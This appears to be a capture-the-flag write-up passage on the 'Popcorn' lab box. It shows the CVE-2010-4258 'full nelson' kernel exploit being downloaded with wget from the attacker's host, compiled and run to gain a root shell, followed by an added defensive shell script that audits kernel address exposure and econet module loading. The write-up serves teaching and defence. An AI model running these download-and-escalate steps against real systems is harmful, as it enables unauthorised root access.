PEAS has discovered that the target system is vulnerable to CVE-2010-4258

CVE-2010-4258


A vulnerability was discovered in Linux kernel 2.6.16.9 (operating system). The affected function is do_exit. Manipulation with an unknown input leads to privilege escalation. This affects confidentiality, integrity and availability.

exploit (full nelson)


The exploit was found online. I will get the x86 version of the exploit.

Exploitation


www-data@popcorn:/dev/shm$ wget http://10.10.14.5:8000/CVE-2010-4258/full-nelson.c
--2023-02-02 14:30:38--  http://10.10.14.5:8000/CVE-2010-4258/full-nelson.c
Connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9124 (8.9K) [text/x-csrc]
Saving to: `full-nelson.c'
 
100%[======================================>] 9,124       --.-K/s   in 0.04s   
 
2023-02-02 14:30:39 (248 KB/s) - `full-nelson.c' saved [9124/9124]

Delivery complete

www-data@popcorn:/dev/shm$ gcc full-nelson.c -o full-nelson

Compile

www-data@popcorn:/dev/shm$ ./full-nelson
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xf845e280
 [+] Resolved econet_ops to 0xf845e360
 [+] Resolved commit_creds to 0xc01645d0
 [+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# whoami
whoami
root
# hostname
hostname
popcorn
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:50:56:b9:f3:bb brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.6/24 brd 10.10.10.255 scope global eth0
    inet6 dead:beef::250:56ff:feb9:f3bb/64 scope global dynamic 
       valid_lft 86398sec preferred_lft 14398sec
    inet6 fe80::250:56ff:feb9:f3bb/64 scope link 
       valid_lft forever preferred_lft forever

System Level Compromise
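
The exploit output above depends on two things a defender can check: kernel symbol addresses being readable by an unprivileged user, and the econet module being loadable. The following hardening audit is an added example, not part of the original write-up or of the exploit. It assumes the addresses come from a /proc/kallsyms-style listing; the function names and the sample files are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the write-up): audit the two preconditions
# visible in the exploit output above.
SYMS='econet_ioctl econet_ops commit_creds prepare_kernel_cred'

# Print the watched symbols that FILE (kallsyms format: "addr type name")
# lists with a non-zero address, i.e. readable by whoever produced FILE.
exposed_symbols() {
    awk -v want="$SYMS" '
        BEGIN { n = split(want, w, " "); for (i = 1; i <= n; i++) watch[w[i]] = 1 }
        ($3 in watch) && $1 !~ /^0+$/ { print $3 }
    ' "$1" | LC_ALL=C sort -u | paste -sd ' ' -
}

# Succeed if modprobe.d-style directory DIR keeps the econet module from loading.
econet_blocked() {
    grep -Eqs '^[[:space:]]*(blacklist[[:space:]]+econet|install[[:space:]]+econet[[:space:]]+/bin/(true|false))[[:space:]]*$' "$1"/*.conf
}

# Report for one host snapshot: kallsyms-format file plus modprobe.d directory.
audit() {
    leaked=$(exposed_symbols "$1")
    if [ -n "$leaked" ]; then echo "FAIL kernel addresses readable: $leaked"
    else echo "PASS kernel addresses hidden (e.g. kernel.kptr_restrict where supported)"; fi
    if econet_blocked "$2"; then echo "PASS econet module loading disabled"
    else echo "FAIL econet module can still be loaded"; fi
}

# Constructed sample data; the four addresses are copied from the output above.
demo=$(mktemp -d)
mkdir "$demo/weak.d" "$demo/hard.d"
cat > "$demo/weak.syms" <<'EOF'
c01645d0 T commit_creds
c01647d0 T prepare_kernel_cred
f845e280 t econet_ioctl [econet]
f845e360 d econet_ops [econet]
c0100000 T _text
EOF
# Hardened snapshot: same listing as an unprivileged reader sees it when
# addresses are masked, plus a modprobe rule that disables econet.
sed 's/^[0-9a-f]*/00000000/' "$demo/weak.syms" > "$demo/hard.syms"
echo 'install econet /bin/true' > "$demo/hard.d/econet.conf"

echo "== unhardened =="; audit "$demo/weak.syms" "$demo/weak.d"
echo "== hardened ==";   audit "$demo/hard.syms" "$demo/hard.d"
```

On a real host, run `audit /proc/kallsyms /etc/modprobe.d` as the unprivileged service account so the result reflects what that account can read.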